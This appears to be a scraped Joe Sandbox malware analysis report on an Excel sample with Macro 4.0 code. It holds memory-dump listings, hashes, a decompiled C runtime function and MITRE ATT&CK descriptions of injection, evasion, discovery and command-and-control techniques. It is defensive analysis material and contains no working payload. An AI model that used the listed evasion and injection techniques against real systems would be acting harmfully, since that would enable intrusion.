Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 973b9dcb1ce90099218b27a12734f9aa9ed46a12e2ab3618f8052c36eccb64eb
Instruction ID: a728f3f82ab3889353a14a0701a6d6670349dce49b1bf5bdf1a525867f9937df
Opcode Fuzzy Hash: 973b9dcb1ce90099218b27a12734f9aa9ed46a12e2ab3618f8052c36eccb64eb
Instruction Fuzzy Hash: 7A11E332A01EC12AD6222AB75CC1A3B365AABD1FBCB240335F226925D1DE6D8C01B250

Uniqueness

Uniqueness Score: -1.00%

Function 00FE5B67, Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00FE4000,00FE5D3C,?,?,00FDB376,?,?,?,00000000,?,00FCB0A7,?,?), ref: 00FE5B6C
_free.LIBCMT ref: 00FE5BC9
_free.LIBCMT ref: 00FE5BFF
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00FDB376,?,?,?,00000000,?,00FCB0A7,?,?,?), ref: 00FE5C0A

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: ca69b846a3e72a3c8fac96233496e9ffbfa71db591c7d754c8c833c9aa79b0a9
Instruction ID: 21446ccfe02021aef4c0c86c0ac75c1552801d6eb2eb1e3d6cd1227266b5f167
Opcode Fuzzy Hash: ca69b846a3e72a3c8fac96233496e9ffbfa71db591c7d754c8c833c9aa79b0a9
Instruction Fuzzy Hash: 4511E932700FC16AE61127BB5C81E3B315AABC1FBCB340225F126965D1DF698C01B350

Uniqueness

Uniqueness Score: -1.00%

Function 00F975CA, Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00F975CA(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t29;

				_t29 = __edx;
				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00F96E5F(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00F96F46(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00F974BD(__ebx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00F973DF(__ebx, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00f975ca
0x00f975ca
0x00f975cf
0x00f975d5
0x00f97648
0x00000000
0x00f975dc
0x00f975dc
0x00f975df
0x00f975fa
0x00f975fd
0x00f9761d
0x00f9762f
0x00f975ff
0x00f975ff
0x00f97602
0x00000000
0x00f97604
0x00f97616
0x00f97616
0x00f97602
0x00f9764d
0x00f97651
0x00f975e1
0x00f975f9
0x00f975f9
0x00f975df

APIs

__cftof_l.LIBCMT ref: 00F975F0

Part of subcall function 00F973DF: __fltout2.LIBCMT ref: 00F9740A

__cftog_l.LIBCMT ref: 00F97616
__cftoe_l.LIBCMT ref: 00F97648

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
Instruction ID: a8a7fb199ae210a6924ee2bae83e548aec928c41c7fc8217301fd5504bd20058
Opcode Fuzzy Hash: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
Instruction Fuzzy Hash: 88117B3241428EFBDF266E89CC55CEE3F62BB58360B598414FA1898031D736D9B1BF81

Uniqueness

Uniqueness Score: -1.00%

Function 00FCB580, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FCB5AB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FCB5FA

Part of subcall function 00FDA0CD: _Yarn.LIBCPMT ref: 00FDA0EC
Part of subcall function 00FDA0CD: _Yarn.LIBCPMT ref: 00FDA110

Strings

bad locale name, xrefs: 00FCB616

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 039d106cfef5fb4906e0b4205d876d3caf9070fdf5ff0b38bd169d29fefecb1a
Instruction ID: 1010d84b41c79e75e1a8805fcf3de7e96b3098417ce94b972d149addd2739ff7
Opcode Fuzzy Hash: 039d106cfef5fb4906e0b4205d876d3caf9070fdf5ff0b38bd169d29fefecb1a
Instruction Fuzzy Hash: 0C11A071905B849FD320DF69C801B47BBE4EF19710F048A5EE889C7B81D7B9A504CBA5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 3F97s4aQjB.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "3F97s4aQjB.xlsx"

Indicators

Macro 4.0 Code

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Function 00FCBF90, Relevance: 40.9, APIs: 3, Strings: 20, Instructions: 691
COMMON

Function 00FCCEB0, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 276
fileCOMMON

Function 00FCBB10, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 251
COMMON

Function 00F91070, Relevance: 4.6, APIs: 3, Instructions: 103
libraryCOMMON

Function 00F930E0, Relevance: 3.0, APIs: 2, Instructions: 43
timeCOMMON

Function 00F92A00, Relevance: 38.9, APIs: 19, Strings: 3, Instructions: 383
filememorytimeCOMMON

Function 00F922C0, Relevance: 6.2, APIs: 4, Instructions: 195
memoryCOMMON

Function 00FD12A0, Relevance: 6.1, APIs: 4, Instructions: 85
networkCOMMON

Function 00F91200, Relevance: 3.2, APIs: 2, Instructions: 201
COMMON

Function 00FD8ED5, Relevance: 1.6, APIs: 1, Instructions: 50
COMMONLIBRARYCODE

Function 00FCD2F0, Relevance: 1.5, APIs: 1, Instructions: 43
networkCOMMON

Function 00FE5CF9, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Function 00FDF6C0, Relevance: 1.5, APIs: 1, Instructions: 11
COMMONLIBRARYCODE

Function 00F9AC3E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
COMMONLIBRARYCODE

Function 00F93C21, Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Function 00F91FE0, Relevance: .2, Instructions: 166
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre